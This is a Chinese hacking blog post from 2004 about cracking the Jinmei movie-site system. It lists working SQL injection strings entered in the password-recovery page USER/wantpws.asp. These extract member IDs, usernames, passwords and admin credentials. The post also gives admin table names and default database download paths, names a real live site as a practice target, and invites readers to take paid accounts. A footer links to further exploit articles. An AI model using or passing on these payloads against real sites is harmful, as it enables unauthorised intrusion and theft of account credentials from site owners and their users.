金梅电影系统破解笔记(破解率80%以上)

所属分类: 实用技巧 / 漏洞研究 阅读数: 628
收藏 0 赞 0 分享
金梅电影系统破解笔记(破解率80%以上)  
从我在265.com的黑客日记本中拷贝出,绝对珍藏!!!!!!!!  
如果以后有机会,我会公开我的日记  

金梅3几乎不存在了,如果有可以用  

黄金眼(上篇14个后台那篇有上传的注册版)  
不会用的 可以看 怪狗的 黄金眼动画教程  

或者 臭要饭的 写的 绝世猜解SQL注入器(这可是个好东东啊)  



下面的东西有些概要,基本上是看  
黑客x档案 4期 和 5期的 总结出的笔记  
针对现在网上的所有金梅版本 好象都有效!!!!!!  
不过那些收费站都是骗人的,里面全是盗连,坏连!!!!!!!!!  
我破解了n个站点,只有几个是好的  

特别注意!!!!:那些代码都是在USER/wantpws.asp 页注入的  

你注册用户名: lamianbu  
密码提示问题: lamianbu  
密友提示答案:(填入方法1和方法2中的代码)  

其实,前两项,和第三项的开头 随便填的,不相同也行  
我都填a的  

还要注意!!!!  
返回页“你的密码是”后面其实不是密码!!!!!!!!!!  

比如方法2 前三次分别得到的是  

id(没用)  
用户名(登陆用)  
密码(登陆用)  



金梅4SQL注入  

心情:   2004-5-14 21:58:26   晴朗   星期五   收藏:    


login.asp    
Register    
高级管理员登录. 用 名:, 密 码:,    


Register高级管理员登录. 用 名:, 密 码:,    



USER/wantpws.asp    
如果你忘记了自己的密码    
如果你忘记了自己的密码,请在如下表单里输入你的密码提示信      
息!. 你注册用户名: 密码提示问题: 密友提示答案:. 返回首      
页.      


方法1    

得注册用户名:    
lamianbu 'union select userid from users where oklook=3 or '0    

oklook=x    
0游1普2白3黄4钻(4手5钻)    

得密码(可能不对应,所以推荐方法2):    
注册用户名处填 用户名' or '1=1    



方法2    

得用户id为xxx:    
lamianbu 'union select id from users where oklook=3 or '0    

得id对应用户名:    
lamianbu 'union select userid from users where id=xxx or '0    

得id对应密码:    
lamianbu 'union select password from users where id=xxx or '0    


得管理员用户名:    
lamianbu 'union select name from password where id>=1 or '0    

得管理员密码:(金梅4有md5加密,看到的是16位乱码)  
lamianbu 'union select pwd from password where id>=1 or '0    

表名:金梅4为:fdg85675fd    
会员版为:password    
有些版本为:okwiantgo    

验证管理员权限:    
lamianbu 'union select flag from password where id>=1    
返回1超,2高,3初,4无    

login.asp    
findaccount.asp    
构造一个变绝对路径    
findaccount.asp?name=xxx&pwd=xxx    


网际快车得数据库:    
movie/admin9988.asp    
金梅4为:data/admin2000.asp 或 data/admin2002.asp    
下载后改为admin9988.mdb    
拿这页练练手啊  
破解出 黄金帐号和密码 请不要 修改和公布(后来人也要练手啊)  
登陆进去 记得走时要退出登陆 (一个帐号不能几人同时用的)  
http://www.westedu.org/mov/USER/wantpws.asp  
更多金梅去 google 找  

实际上金梅系统没有这页也可以  
构造出同版本的类似页进行注入  
更多精彩内容其他人还在看

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
收藏 0 赞 0 分享

跨站脚本攻击+Cookies欺骗(Discuz篇)

跨站脚本攻击+Cookies欺骗(Discuz篇)
收藏 0 赞 0 分享

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞
收藏 0 赞 0 分享

关于对SQL注入80004005 及其它错误消息分析

关于对SQL注入80004005 及其它错误消息分析
收藏 0 赞 0 分享

针对蓝牙PIN码的最新攻击技术细节分析

针对蓝牙PIN码的最新攻击技术细节分析
收藏 0 赞 0 分享

细说3721网络实名“病毒”

细说3721网络实名“病毒”
收藏 0 赞 0 分享

浅谈SQL SERVER数据库口令的脆弱性

浅谈SQL SERVER数据库口令的脆弱性
收藏 0 赞 0 分享

MSHTA漏洞为黑客大开远程控制之门(图)

MSHTA漏洞为黑客大开远程控制之门(图)
收藏 0 赞 0 分享

再探九酷网络个人主页空间管理系统

再探九酷网络个人主页空间管理系统
收藏 0 赞 0 分享

黑客突破防火墙常用的几种技术

黑客突破防火墙常用的几种技术
收藏 0 赞 0 分享
查看更多